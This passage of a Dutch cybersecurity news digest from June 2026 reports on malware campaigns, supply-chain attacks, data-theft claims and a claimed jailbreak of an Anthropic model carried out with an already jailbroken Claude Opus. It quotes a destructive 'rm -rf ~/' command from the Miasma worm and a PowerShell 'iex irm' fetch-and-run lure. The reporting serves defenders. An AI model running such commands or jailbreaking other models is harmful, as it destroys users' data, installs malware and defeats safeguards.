De exploit wordt aangeboden voor 3 bitcoin, terwijl de infrastructuurdata beschikbaar zou zijn voor 1,2 bitcoin. Het is belangrijk te benadrukken dat alle claims van Orcinus niet geverifieerd zijn. Er is geen onafhankelijke bevestiging dat de exploit daadwerkelijk werkt of dat de aangeboden data authentiek is. Advertenties van dit type op criminele fora blijken regelmatig overdreven of zelfs volledig vals te zijn. Desondanks illustreert de advertentie de aanhoudende criminele interesse in het omzeilen van cloudbeveiliging en de potentiële risico's voor organisaties die afhankelijk zijn van dergelijke beschermingslagen.

 

Bron: Cybercrimeinfo

11 juni 2026 | Google Chrome wijzigt werking van adblockers, mogelijk meer advertenties

Google staat op het punt om de functionaliteit van extensies voor adblockers in zijn Chrome browser aanzienlijk te wijzigen. Deze aanpassing houdt in dat extensies voor adblockers niet langer zelf het internetverkeer kunnen inspecteren. In plaats daarvan moeten de extensies een beperkte lijst met filterregels aan de browser van Google aanleveren. Dit betekent dat de effectiviteit van het blokkeren van advertenties mogelijk afneemt, waardoor er meer advertenties doorkomen.

De wijziging heeft potentieel grote gevolgen voor gebruikers, waaronder die in Nederland en België, die vertrouwen op adblockers voor een veiligere en minder opdringerige online ervaring. Adblockers spelen een cruciale rol in het tegengaan van malvertising, waarbij cybercriminelen kwaadaardige advertenties gebruiken om malware te verspreiden of gebruikers naar phishing-websites te leiden. Een verzwakte blokkering kan de blootstelling aan dergelijke dreigingen vergroten.

Gebruikers die zich zorgen maken over deze ontwikkeling, zullen mogelijk alternatieve methoden moeten overwegen om hun online privacy en veiligheid te waarborgen. De exacte impact en de mate waarin advertenties en potentiële dreigingen zullen toenemen, zullen duidelijk worden zodra de wijziging volledig is doorgevoerd. De kern van de aanpassing is de verschuiving in controle, van een actieve inspectie door de extensie naar een passievere rol, waarbij de extensie afhankelijk is van de filteringmogelijkheden van de browser zelf.

 

Bron: Google

11 juni 2026 | Broncode van Miasma malware kort gelekt op GitHub

De broncode van de Miasma-worm, een aanvalsframework dat inloggegevens steelt en recentelijk open source ecosystemen heeft getarget via supply chain aanvallen, is kortstondig openbaar gemaakt op GitHub. Miasma wordt beschouwd als een evolutie van de eerdere Shai-Hulud-worm, waarvan de code eerder ook al op GitHub was gelekt en die veel van dezelfde functionaliteiten, technieken en zelfs code deelt.

De malware infecteert een ontwikkelaarsmachine, steelt de bouwomgeving en cloud-inloggegevens, en gebruikt deze vervolgens om legitieme repositories en pakketten te compromitteren. Hierna publiceert de malware getrojaniseerde versies om stroomafwaartse ontwikkelaars te infecteren en de cyclus te herhalen. Dit autonome, wormachtige zelfverspreidingsmechanisme kan zijn bereik snel vergroten, waardoor een enkele inbreuk potentieel kan uitgroeien tot een wijdverspreide supply chain aanval.

Miasma is eerder in verband gebracht met spraakmakende aanvallen op npm pakketten van Red Hat en, recenter, op 73 Microsoft-repositories op GitHub. Onderzoekers van SafeDep rapporteerden gisteren dat de Miasma-broncode via tal van gecompromitteerde ontwikkelaarsaccounts op GitHub was gelekt. In elk van deze accounts publiceerden de dreigingsactoren de broncode in een repository genaamd "Miasma-Open-Source-Release". Dit duidt erop dat de broncode opzettelijk is vrijgegeven, vergelijkbaar met de eerdere publicatie van de Shai-Hulud-code.

Een analyse van de code toonde aan dat het toolkit geen command and control (C2) infrastructuur nodig heeft om te functioneren, aangezien het GitHub hiervoor gebruikt. Het framework verzamelt inloggegevens van cloud-providers, CI/CD-systemen, wachtwoordbeheerders, Kubernetes en secret stores. Deze inloggegevens worden misbruikt om npm-, PyPI- en RubyGems-pakketten te compromitteren, evenals GitHub-repositories, GitHub Actions workflows en JFrog Artifactory-instanties. Bovendien kan Miasma lateraal bewegen via SSH en AWS Systems Manager (SSM) en configuraties van AI-coderingstools zoals Claude, Gemini, Cursor, Copilot, Kiro en Cline vergiftigen.

Een opvallende functie die in de gelekte Miasma-broncode is ontdekt, is een "dead-man switch" die wordt geïnstalleerd wanneer de malware een gestolen GitHub-token van een slachtoffer gebruikt als exfiltratiekanaal. Dit onderdeel controleert elke minuut de geldigheid van het token en, indien ingetrokken, voert een destructief commando uit (rm -rf ~/; rm -rf ~/Documents) dat recursief bestanden en mappen in de home- en documentenmappen van de gebruiker verwijdert. De monitor draait als een systemd-gebruikersservice op Linux of een LaunchAgent op macOS en blijft tot 72 uur actief.

Een ander interessant aspect is een vijfstappen bouw-pipeline die unieke payloads genereert voor elke build. SafeDep meldt dat dit proces AES-256-GCM-encryptie per bestand van ingebedde assets combineert met gerandomiseerde string-obfuscatie, bron-transformaties, JavaScript-obfuscatie en een zelfuitpakkende loader die de uiteindelijke payload in drie lagen encryptie verpakt. Willekeurige sleutels en een gerandomiseerde buitenste coderingslaag zorgen ervoor dat elk gegenereerd sample verschilt van eerdere builds, wat detectie op basis van handtekeningen en statische analyse bemoeilijkt.

Het lek van Shai-Hulud leidde tot de release van geavanceerdere varianten, zoals Miasma, en tot hogere aanvalsfrequenties. Op dezelfde manier wordt verwacht dat het lek van de Miasma-broncode een vergelijkbaar effect zal hebben, aangezien dreigingsactoren de code zullen adopteren en verder aanpassen. Dit kan aanzienlijke gevolgen hebben voor de beveiliging van het open source ecosysteem, aangezien supply chain aanvallen dit ecosysteem in een ongekend tempo blijven targeten. Software-ontwikkelaars wordt geadviseerd om projectafhankelijkheden vast te zetten, vertragingen van meerdere dagen in te voeren voordat nieuw uitgebrachte pakketupdates worden geadopteerd, en nieuwe builds te valideren in geïsoleerde testomgevingen.

 

Bron: SafeDep | Bron 2: hubs.li

11 juni 2026 | GitHub versterkt beveiliging van npm tegen supplychainaanvallen

GitHub heeft aangekondigd dat npm v12, dat naar verwachting volgende maand wordt uitgebracht, aanzienlijke beveiligingswijzigingen zal introduceren. Deze aanpassingen zijn gericht op het tegengaan van supplychainaanvallen die misbruik maken van gedragingen die worden geactiveerd door het `npm install`-commando. Dit commando wordt gebruikt om de afhankelijkheden van een project te downloaden en te installeren, en om eventuele installatiegerelateerde scripts uit te voeren die door de pakketten zijn gedefinieerd. Ontwikkelaars voeren dit commando uit na het klonen van een project, het ophalen van updates of tijdens CI/CD-builds. Aanvallers richten zich hierop vanwege het potentieel voor geautomatiseerde code-uitvoering tijdens de pakketinstallatie.

De kern van de aankondiging is dat code-uitvoering en niet-registerafhankelijke bronnen die momenteel automatisch worden geactiveerd tijdens `npm install`, nu expliciete goedkeuring zullen vereisen in plaats van standaard te worden vertrouwd. Specifiek heeft GitHub de volgende wijzigingen bekendgemaakt:

Vanaf versie 12 zal `npm install` geen `preinstall`, `install` of `postinstall` scripts van afhankelijkheden uitvoeren, tenzij deze expliciet zijn goedgekeurd. Dit geldt ook voor native module-builds die via `node-gyp` worden geactiveerd, en `prepare`-scripts van Git-, lokale bestands- en gekoppelde afhankelijkheden. Daarnaast zal `npm install` geen afhankelijkheden meer ophalen uit Git-repositories, zowel directe als transitieve, tenzij dit expliciet is toegestaan. GitHub stelt dat dit een pad voor code-uitvoering elimineert waarbij het `.npmrc`-bestand van een Git-afhankelijkheid de gebruikte Git-executable zou kunnen wijzigen, zelfs als installatiescripts zijn uitgeschakeld. Tot slot zullen afhankelijkheden die zijn geïnstalleerd vanaf externe URL's, zoals HTTPS-tarballs, niet langer worden opgelost tenzij dit expliciet is toegestaan. Dit geldt voor zowel directe als transitieve afhankelijkheden.

Deze veranderingen kunnen supplychainaanvallen aanzienlijk verminderen door de automatische uitvoering van installatiescripts, de automatische resolutie van Git-gebaseerde afhankelijkheden en de automatische resolutie van externe URL-afhankelijkheden te verwijderen. De nieuwe standaardinstellingen hadden diverse aanvalstechnieken die in recente supplychainaanvallen werden gebruikt, kunnen verstoren. Voorbeelden hiervan zijn campagnes met kwaadaardige `preinstall`/`postinstall` scripts die gericht waren op `eslint-config-prettier`, Toptal's Picasso-pakketten, tientallen datastelende npm pakketten, evenals misbruik van Git-afhankelijkheden zoals gedocumenteerd in de Shai-aanvallen met Hulud.

Projecten die voor legitieme workflows afhankelijk zijn van deze gedragingen, moeten expliciet opt-in geven voordat ze upgraden naar npm v12. GitHub adviseert ontwikkelaars om zich voor te bereiden door te upgraden naar npm 11.16.0 of nieuwer. Deze versies geven waarschuwingen weer bij alle acties die onder versie 12 zullen worden verbroken. Dit stelt ontwikkelaars in staat om deze waarschuwingen te beoordelen en afhankelijkheden of workflows te identificeren die expliciete goedkeuring zullen vereisen vóór de upgrade. Na de upgrade naar versie 12 zullen alleen expliciet goedgekeurde scripts en afhankelijkheidsbronnen automatisch blijven functioneren. Er is een communitydiscussie geopend waar ontwikkelaars hun suggesties over de aankomende wijzigingen kunnen delen.

 

Bron: GitHub | Bron 2: hubs.li

11 juni 2026 | Oracle PeopleSoft servers doelwit van datadiefstal door ShinyHunters

De beruchte ShinyHunters afpersingsgroep claimt data te hebben gestolen van meer dan honderd organisaties via aanvallen op Oracle PeopleSoft servers. Het gaat hierbij om zowel op de cloud gebaseerde als on-premise implementaties van de PeopleSoft bedrijfssoftware, die door grote organisaties wordt gebruikt voor het beheer van bedrijfsprocessen zoals human resources, salarisadministratie, financiën, supply chain management en studentenadministratie.

Gisteren kwamen details naar buiten over deze grootschalige data diefstal aanvallen, waarbij getroffen klanten afpersingsberichten ontvingen die waren ondertekend door ShinyHunters. Vandaag heeft de dreigingsactor aan BleepingComputer bevestigd verantwoordelijk te zijn voor de aanvallen. Ze beweren data te hebben buitgemaakt van 300 PeopleSoft instanties bij meer dan 100 organisaties.

Volgens ShinyHunters maken ze gebruik van een "gadget chain" van zowel verouderde als zeroday kwetsbaarheden om de aanvallen uit te voeren. De groep merkt op dat de aanval niet op alle systemen werkt en vermoedt dat het succes afhangt van de configuratie van een specifieke PeopleSoft-instantie. Oracle is benaderd voor commentaar over een mogelijk misbruikte zeroday kwetsbaarheid, maar heeft nog niet gereageerd.

De dreigingsactor stelt dat de meeste getroffen organisaties in de onderwijssector actief zijn, waarvan velen al eerder zijn afgeperst. ShinyHunters beweerde aanvankelijk een FBI-portaal, dat ook op PeopleSoft draait, te willen hacken om een verklaring te publiceren en "misinformatie recht te zetten". Deze poging is echter mislukt.

De Universiteit van Nottingham is een van de slachtoffers van deze aanvallen, en de data van de universiteit is reeds gepubliceerd op de data lek site van ShinyHunters. De universiteit heeft vandaag een verklaring uitgegeven waarin het cybersecurity incident wordt bevestigd.

Ondanks het uitblijven van publieke informatie van Oracle, heeft cybersecurity onderzoeker "Michael R" diverse online directories ontdekt die tooling bevatten die gerelateerd is aan deze aanvalscampagne. De onderzoeker meldde dat "ShinyHunters, (of een groep die hen imiteert) verschillende directories heeft blootgelegd die de voortdurende targeting van PeopleSoft (Enterprise Resource Planning software) omgevingen onthullen." Ook waren staging materialen zichtbaar, waaronder MeshCentral agents, en een script voor het aanpassen van websites en het stelen van inloggegevens.

Michael R deelde de volgende IP-adressen als Indicators of Compromise (IOCs) die verband houden met deze aanvallen:

142.11.200[.]186

142.11.200[.]187

142.11.200[.]188

142.11.200[.]189

142.11.200[.]190

108.174.202[.]99

176.120.22[.]24

Sommige van deze IP-adressen gebruikten een TLS-certificaat met de common name "azurenetfiles[.]net", een domein dat eerder in verband werd gebracht met de ShinyHunters afpersingsgroep. Vijf van de servers toonden een .bash_history-bestand dat inzicht gaf in de aanvallen, waaronder een shell script dat is ontworpen om een losgeldbriefje met de naam "README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT" aan te maken op een interne PeopleSoft-server na een succesvolle inbraak.

Het script analyseert het /etc/hosts-bestand om PeopleSoft-gerelateerde systemen te identificeren en probeert verbinding te maken via SSH met behulp van veelvoorkomende PeopleSoft en Oracle administratieve accounts zoals 'psoft', 'oracle' en 'linuxadm'. Als wachtwoordverificatie mislukt, probeert het script terug te vallen op authenticatie via SSH-sleutels. Eenmaal verbonden plaatst het script het losgeldbriefje in directories die geassocieerd zijn met PeopleSoft web en applicatieservers.

Organisaties die Oracle PeopleSoft gebruiken, wordt dringend geadviseerd om hun logs te analyseren op verbindingen vanaf de bovengenoemde IP-adressen om vast te stellen of zij het doelwit waren van deze aanvallen. Indien deze IOCs worden aangetroffen, dienen organisaties onmiddellijk een incidentrespons te starten, te onderzoeken of hun PeopleSoft-instantie is gecompromitteerd, en te overwegen getroffen servers tijdelijk van internettoegang te verwijderen totdat de omgeving kan worden beveiligd en gecontroleerd.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

11 juni 2026 | AI model Claude Fable 5 van Anthropic succesvol 'jailbroken'

Het recent gelanceerde geavanceerde AI model Fable 5 van Anthropic is succesvol 'jailbroken'. De doorbraak werd gerealiseerd door een individu dat gebruikmaakte van een reeds 'jailbroken' versie van Claude Opus, een ander AI model. Dit incident benadrukt de voortdurende uitdagingen op het gebied van de beveiliging van kunstmatige intelligentie en de kwetsbaarheid van zelfs de meest geavanceerde systemen.

'Jailbreaking' in de context van AI modellen verwijst naar het proces waarbij de ingebouwde veiligheids- en ethische protocollen van een model worden omzeild. Dit stelt gebruikers in staat om het AI model instructies te geven die normaal gesproken zouden worden geblokkeerd, bijvoorbeeld het genereren van schadelijke inhoud, onethische adviezen of het openbaar maken van gevoelige informatie. De mogelijkheid om een nieuw 'frontier model' zoals Fable 5 te omzeilen, vooral door middel van een reeds gecompromitteerd model als Claude Opus, duidt op een potentiële keten van kwetsbaarheden binnen de AI-ecosystemen.

Dit incident onderstreept de noodzaak voor AI-ontwikkelaars om robuustere verdedigingsmechanismen te implementeren en de interacties tussen verschillende AI modellen nauwlettend te volgen. Het succesvol omzeilen van Fable 5 kan leiden tot verdere pogingen om andere geavanceerde AI systemen te manipuleren, met mogelijke gevolgen voor de betrouwbaarheid en veiligheid van AI-toepassingen in diverse sectoren.

 

Bron: Pliny the Liberator

11 juni 2026 | Hacker claimt verkoop van 533 GB aan Franse en Europese zorgdata

Een hacker, bekend onder de naam Zab26, claimt een aanzienlijke hoeveelheid data afkomstig van Franse en andere Europese zorgsystemen te koop aan te bieden op een ondergronds forum. De geadverteerde dataset heeft een omvang van 533 GB, verdeeld over 1,16 miljoen bestanden en meer dan 115 miljoen databaserecords. De gestolen informatie zou naar verluidt 534.697 medische documenten met Protected Health Information (PHI) en 479.877 burgerservicenummers (Social Security numbers) omvatten. Daarnaast worden patiënt- en medische dossiergegevens, inloggegevens, tokens, wachtwoorddata, private keys en TLS certificaten genoemd als onderdeel van de buitgemaakte data.

De verkoper beweert niet alleen in het bezit te zijn van statische data, maar ook over live operationele toegang tot de betreffende systemen te beschikken. Dit omvat naar eigen zeggen een querypad naar het nationale DMP (Dossier Médical Partagé) platform van Frankrijk, evenals toegang tot Kubernetes clusters, mail en Slack. Indien deze beweringen waar zijn, zou dit duiden op een actieve en aanhoudende compromittering van de getroffen infrastructuren. De aanwezigheid van private keys en TLS certificaten verhoogt bovendien het risico op identiteitsdiefstal en verdere, diepere intrusie in de systemen.

De immense omvang en de gevoelige aard van de geclaimde data maken dit tot een potentieel zeer ernstig datalek voor de Europese zorgsector. Het zou honderdduizenden medische en identiteitsdocumenten betreffen, naast een groot aantal burgerservicenummers en miljoenen rijen persoonlijke gegevens gekoppeld aan Franse en Europese gezondheidssystemen.

Deze claims zijn echter nog volledig onbevestigd. De dataset en de vermeende toegang worden te koop aangeboden op een ondergronds forum, waarbij toegang tot samples achter een wachtwoord is afgeschermd en contact via XMPP of het forum verloopt. Gezien de buitengewone reikwijdte van de claim, is uiterste voorzichtigheid geboden. Grootschalige aanbiedingen die een breed scala aan "allesomvattende" data beloven, zijn soms overdreven of samengesteld uit meerdere bronnen. Er is geen onafhankelijke bevestiging van de claim en geen van de mogelijk getroffen organisaties heeft hier publiekelijk op gereageerd.

 

Bron: Cybercrimeinfo

11 juni 2026 | Scammers misbruiken TikTok en Instagram Reels voor Vidar infostealer

Cybercriminelen hebben een nieuwe methode ontwikkeld om gebruikers van sociale media te misleiden, waarbij ze kwaadaardige bestanden verbergen in korte videoclips. Onderzoeksbureau ReversingLabs heeft ontdekt dat aanvallers TikTok en Instagram Reels exploiteren voor de verspreiding van de Vidar infostealer, een beruchte infostealer. Deze campagnes wijken af van traditionele phishing via e-mail, omdat ze de algoritmes van sociale mediaplatforms manipuleren om kwaadaardige inhoud viraal te laten gaan.

De aanpak omvat het creëren van video's in tutorial-stijl die gratis toegang beloven tot betaalde applicaties, zoals Spotify Premium of Microsoft Word. De oplichters zorgen ervoor dat de video's er professioneel uitzien, compleet met duidelijke graphics en geautomatiseerde voice-overs, om zo autoriteit uit te stralen en vertrouwen te wekken bij de kijkers.

Een van de waargenomen technieken omvat het aanmaken van accounts met gebruikersnamen zoals "windows.tips", waarbij een blauw-wit kroonlogo wordt gebruikt dat het officiële Windows-icoon nabootst. De video's instrueren kijkers om PowerShell op hun Windows-computers te openen en een specifiek commando in te typen: "iex irm". Deze misleidende instructie zorgt ervoor dat het besturingssysteem stilzwijgend verbinding maakt met een externe server om een kwaadaardige payload op te halen en uit te voeren. Gebruikers wordt bijvoorbeeld verteld de tool te richten op een domein zoals "msget.run/spotify". Omdat de video als veilig wordt gepresenteerd, voeren veel gebruikers de code uit zonder te controleren wat er daadwerkelijk wordt gedownload.

Een tweede strategie speelt in op de nieuwsgierigheid van gebruikers met behulp van informele videoclips. Scammers plaatsen video's waarin ze premium app-functionaliteiten demonstreren, vaak begeleid door populaire achtergrondmuziek, en moedigen kijkers aan om te reageren met woorden zoals "ok" om het 'geheim' te leren. Zodra een gebruiker reageert, stuurt de aanvaller een direct bericht met een link naar valse downloadsites, zoals "d4ug.site". Deze sites beweren premium games en AI tools te ontgrendelen, maar leiden slachtoffers in werkelijkheid om naar nutteloze enquêtes of kwaadaardige links.

Volgens de analyse van ReversingLabs is het succes van deze video's te danken aan het manipuleren van de platformalgoritmes. Aanbevelingssystemen geven de voorkeur aan inhoud die door gebruikers wordt opgeslagen of gedeeld. Aangezien tutorials vaak worden opgeslagen om later te bekijken, verspreidt het systeem deze clips naar een breder publiek. Onderzoekers merkten op dat één van de tijdens het onderzoek gevolgde video's 109.000 keer is bekeken, 1.699 keer is opgeslagen en 974 keer is gedeeld.

Na het volgen van de instructies wordt een bestand met de naam "build.exe" op de computer van de gebruiker gedropt, dat de Vidar Infostealer bevat. Vidar is een wijdverspreide infostealer die op ondergrondse marktplaatsen wordt verkocht als een Malware-as-a-Service (MaaS) model. Cybercriminelen kunnen een levenslange licentie aanschaffen voor 300 dollar om allerlei gegevens te stelen, waaronder wachtwoorden, bankgegevens en browsercookies. De Vidar infostealer is recentelijk bijgewerkt om stabieler te zijn en beter in staat om geautomatiseerde beveiligingsfilters te omzeilen.

Het verdedigen tegen deze campagnes is lastig, mede doordat hackers waarschuwende opmerkingen van eerdere slachtoffers kunnen verwijderen. ReversingLabs heeft de scam-accounts gemeld aan Instagram, maar het platform heeft de meldingen afgewezen. Onderzoekers dringen er nu bij gebruikers op aan om geen onbetrouwbare commando's in terminalprogramma's in te voeren. Bedrijven moeten hun personeel trainen om oplichtingspraktijken op sociale media te herkennen. Voorbereiding is in dit geval de ultieme verdediging.

 

Bron: ReversingLabs

11 juni 2026 | Hackers misbruiken neppe softwaredownloads voor cryptojacking en installatie van ScreenConnect

Hackers zetten alledaagse zoekopdrachten naar software om in een val, waarbij ze een geavanceerde cryptojackingcampagne uitvoeren die gebruikers lokt met malware-besmette bestanden. Deze bestanden minen in het geheim cryptocurrency met behulp van de GPU van het slachtoffer. De aanvallers hebben een netwerk van meer dan 150 nep-downloadsites opgezet die populaire hulpprogramma's, zoals CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack en PDFgear, imiteren.

Analisten van Microsoft, waaronder de Microsoft Defender Experts en het Microsoft Defender Security Research Team, identificeerden deze campagne en publiceerden hun bevindingen eind mei 2026. Zij deelden een rapport waarin staat dat de campagne specifiek gericht is op gebruikers met krachtige grafische kaarten, zoals gamers, hardware-enthousiastelingen en AI-ontwikkelaars. De strategie is berekend. Minder machines infecteren, maar wel de maximale mining-waarde uit elke machine halen.

Een zorgwekkende ontwikkeling is dat de campagne slachtoffers bereikt via reacties van AI chatbots. In april 2026 observeerden onderzoekers dat gebruikers links naar door aanvallers gecontroleerde domeinen ontvingen via AI chatbot aanbevelingen, wanneer zij om softwaredownloadsuggesties vroegen. Dit markeert een verontrustende verschuiving voorbij traditionele zoekmachinemanipulatie naar een omgeving die veel gebruikers als betrouwbaarder beschouwen.

Naast het financiële motief van cryptocurrency-mining installeren de aanvallers ook ScreenConnect op gecompromitteerde machines om persistente externe toegang te behouden. Dit opent de deur naar veel schadelijker vervolgactiviteiten, waaronder diefstal van data, laterale beweging binnen bedrijfsnetwerken en zelfs de inzet van ransomware. De campagne is nog steeds actief en het bereik ervan blijft groeien.

De infectie begint zodra een gebruiker een legitiem ogende utility-installer downloadt en uitvoert. Het ZIP-archief bevat de echte applicatie naast een kwaadaardig bestand genaamd `autorun.dll`, dat automatisch wordt geladen wanneer het legitieme programma start via een techniek die bekendstaat als DLL-sideloading. Deze methode vereist geen software-exploit en laat vaak geen zichtbaar spoor achter op het scherm.

Zodra `autorun.dll` draait, dropt het een tweede kwaadaardig bestand genaamd `vcredist_x64.dll` met behulp van Windows Installer, dat fungeert als een verpakte ScreenConnect-installer. Nadat ScreenConnect is geïnstalleerd, maakt de geïnfecteerde machine verbinding met een door de aanvaller gecontroleerde server op 193.42.11[.]108. Via dit externe toegangskanaal pushen de aanvallers een uitvoerbaar bestand genaamd `SimpleRunPE.exe` naar het systeem van het slachtoffer.

`SimpleRunPE.exe` voert vervolgens de zware taken uit. Het zorgt voor persistentie met behulp van Registry Run keys en geplande taken, past uitsluitingen voor beveiligingstools aan om verborgen te blijven, en gebruikt process hollowing om mining-code te injecteren in een door Microsoft ondertekend binair bestand. Afhankelijk van de configuratie kunnen drie GPU-miners worden ingezet, namelijk gminer, lolMiner en SRBMiner-MULTI. De malware houdt ook analyse-tools zoals Windows Taakbeheer, Process Hacker en Process Explorer in de gaten. Zodra het een van deze tools detecteert, pauzeert het onmiddellijk de mining om argwaan te vermijden. Zodra die tools sluiten, wordt het minen op de achtergrond geruisloos hervat.

Het gebruik van ScreenConnect door de campagne maakt van elke gecompromitteerde machine een langdurig toegangspunt. Zelfs als de miningsoftware wordt gedetecteerd en verwijderd, kan de ScreenConnect-backdoor actief blijven, waardoor aanvallers een weg terug hebben. Beveiligingsteams moeten actief zoeken naar ongeautoriseerde ScreenConnect-sessies en installaties die niet door de IT-afdeling zijn goedgekeurd.

Microsoft adviseert om te monitoren op ongebruikelijke pieken in GPU-gebruik op desktops en servers als een vroeg teken van ongeautoriseerde mining. Het correleren van verwijzingsdata van het web en telemetrie van endpoints kan teams helpen sneller verbanden te leggen bij het onderzoeken van alerts. Gebruikers moeten software uitsluitend downloaden van officiële websites van de leverancier en elke link die wordt gesuggereerd door een AI tool met dezelfde scepsis behandelen als elk ander zoekresultaat.

Verdedigers moeten ook alerts instellen voor bestanden zoals `SimpleRunPE.exe` en letten op DLL's genaamd `autorun.dll` of `vcredist_x64.dll` die in onverwachte mappen verschijnen. Het blokkeren van bekende kwaadaardige domeinen en het monitoren van DNS-verkeer op subdomeinen van `gleeze[.]com` kan helpen de leveringsinfrastructuur van de campagne af te sluiten voordat een download plaatsvindt.

 

Bron: Microsoft

11 juni 2026 | Hackers gebruiken phishing voor malware in werkgeheugen van Windows systemen

Op 11 juni 2026 is bekend geworden dat hackers geavanceerde in-memory malware verspreiden op systemen van Windows, door middel van phishing-e-mails die officiële belastingautoriteiten imiteren. De campagne, genaamd Operation TaxShadow, is sinds minstens 20 mei 2026 actief en richt zich op individuen in onder andere India en Japan. De e-mails zaaien paniek met waarschuwingen voor financiële boetes en deadlines.

De aanval begint met een overtuigend opgestelde e-mail. Slachtoffers die op de link klikken, komen terecht op een nagemaakte overheidswebsite, waar ze een ZIP-bestand downloaden dat wordt gepresenteerd als een officieel belastingdocument, maar in werkelijkheid een volledig voorbereid malwarepakket is.

Onderzoekers van Cyfirma hebben de campagne geïdentificeerd en vastgesteld dat dezelfde infrastructuur die werd gebruikt voor phishingpagina's die Indiase belastingautoriteiten imiteren, ook nagemaakte Japanse overheidsbelastingportals hostte. Cyfirma benadrukt dat de combinatie van geheugenresidente malware, geavanceerde ontwijking en hergebruikte infrastructuur duidt op een volwassen en goed uitgeruste dreigingsoperatie.

Deze campagne is bijzonder gevaarlijk door de social engineering en de geavanceerde malware. De payload draait bijna volledig in het geheugen en schrijft niets naar de schijf, waardoor standaard antivirusprogramma's worden omzeild. De malware onderhoudt een persistente verbinding met command-and-control-servers via verkeer dat zich vermengt met normale webactiviteit. De phishing-e-mails slaagden voor authenticatiecontroles zoals SPF, DKIM en DMARC, omdat ze via een legitieme externe e-mailbezorgdienst werden verzonden, waardoor ze spamfilters konden omzeilen.

Het kwaadaardige ZIP-archief bevat drie bestanden, een launcher, een loader-bibliotheek genaamd SbieDll.dll, en een versleutelde payload genaamd SbieDll.bin. De launcher bereidt de omgeving voor. De loader, SbieDll.dll, maakt misbruik van DLL Search Order Hijacking door een malafide DLL in de applicatiemap te plaatsen, waardoor Windows deze laadt. De loader manipuleert vervolgens toegangstokens en verwijdert permissiebarrières. Het laatste onderdeel, SbieDll.bin, bevat de kernpayload, versleuteld met aangepaste RC4. Na ontsleuteling tijdens runtime wordt deze direct in het geheugen geladen via Reflective PE Loading, zonder dat een bestand de schijf raakt, wat detectie bemoeilijkt.

De malware maakt verbinding met zijn command-and-control-server via WebSocket-verbindingen, die starten als standaard HTTP-verzoeken en upgraden naar een persistent kanaal, waardoor verkeer normaal lijkt. Het ondersteunt ook HTTP CONNECT voor routering via bedrijfsproxies. Om analyse te weerstaan, gebruikt de malware een op Mersenne Twister gebaseerde engine om het uitvoergedrag te wijzigen, Control Flow Flattening om de codestructuur te versleutelen en lost Windows API-aanroepen op tijdens runtime via hashing, wat statische analyse bemoeilijkt.

Cyfirma vond Chinese taalstrings in de broncode van de phishingpagina, hoewel dit de herkomst van de aanvallers niet bevestigt. Cyfirma beveelt voortdurende training in beveiligingsbewustzijn aan over phishing en overheidsimitatie. Technische teams moeten YARA- en Sigma-regels implementeren voor DLL-hijacking, reflective loading en WebSocket C2-patronen, en continue geheugenmonitoring inschakelen om dreigingen te detecteren die traditionele verdedigingsmechanismen omzeilen. Indicators of Compromise (IoC's) zijn beschikbaar.

 

Bron: Cyfirma

11 juni 2026 | Kwaadaardig npm pakket dbmux compromitteert ontwikkelaarssystemen

Op 9 juni 2026 is een kwaadaardig pakket met de naam dbmux ontdekt op npm, een van de meest gebruikte pakketregisters ter wereld. Het pakket is specifiek gericht op softwareontwikkelaars en bleek verborgen malware te bevatten die aanvallers volledige controle kan geven over elk ontwikkelaarssysteem waarop het was geïnstalleerd of uitgevoerd. Beveiligingsonderzoekers hebben de dreiging als kritiek beoordeeld.

Dbmux leek een legitiem hulpprogramma, maar bevatte code die ontworpen was om volledige toegang tot getroffen machines over te dragen aan een externe partij. Ontwikkelaars die dit pakket installeerden als onderdeel van hun dagelijkse workflow, openden onbewust de deur naar een potentieel ernstige compromittering. Deze aanval volgt een bekend patroon bij incidenten in de toeleveringsketen van software, waarbij kwaadwillende actoren schadelijke code inbedden in pakketten die ontwikkelaars vertrouwen en routinematig in hun projecten gebruiken.

Volgens een rapport van SupplyChainAttack.org moet elke computer waarop dbmux is geïnstalleerd of uitgevoerd, als volledig gecompromitteerd worden beschouwd. De waarschuwing, die ook wordt gevolgd onder GitHub Advisory GHSA-62wx-5f55-w8g2, benadrukt dat volledige controle over de getroffen systemen mogelijk is overgedragen aan een externe partij. Dit plaatst het incident onder de meest ernstige typen aanvallen op de toeleveringsketen.

De reikwijdte van de potentiële impact is bijzonder zorgwekkend. Elke ontwikkelaar die dit pakket, zelfs tijdelijk, in zijn omgeving heeft gehaald, loopt het risico dat zijn referenties, tokens, API sleutels en andere gevoelige gegevens aan aanvallers worden blootgesteld. De aanval vereist geen specifieke gebruikersinteractie naast de installatie zelf, wat het bijzonder gevaarlijk maakt in geautomatiseerde build-pipelines en CI/CD-omgevingen.

De timing van deze ontdekking is ook zorgwekkend, aangezien rond dezelfde periode, op 10 juni 2026, verschillende gerelateerde kwaadaardige npm pakketten werden ontdekt. Deze omvatten onder andere @meme-sdk/trade, graphbase-js, @validator-sdk/pubkey en @validate-ethereum-address/core. Elk van deze pakketten kreeg een vergelijkbare kritieke beoordeling en maakte gebruik van dezelfde aanvalsvector via een gecompromitteerd pakket, wat duidt op een gecoördineerde golf van supply chain aanvallen gericht op het npm-ecosysteem.

De aanvalsvector in dit geval was een gecompromitteerd pakket, wat betekent dat kwaadaardige code direct in het dbmux npm pakket zelf was ingebed. Zodra een ontwikkelaar `npm install` uitvoerde en het pakket op zijn systeem landde, was de malware al gepositioneerd om te worden uitgevoerd. Deze aanpak omzeilt veel traditionele beveiligingscontroles, omdat de dreiging vermomd arriveert als een afhankelijkheid in plaats van een voor de hand liggende inbraakpoging. De GitHub Advisory vermeldt dat de malware mogelijk aanvullende kwaadaardige software op de getroffen systemen heeft geïnstalleerd, verder dan het oorspronkelijke pakket. Dit betekent dat het simpelweg verwijderen van dbmux geen garantie biedt voor een schoon systeem, aangezien aanvallers mogelijk persistente tools of backdoors hebben achtergelaten.

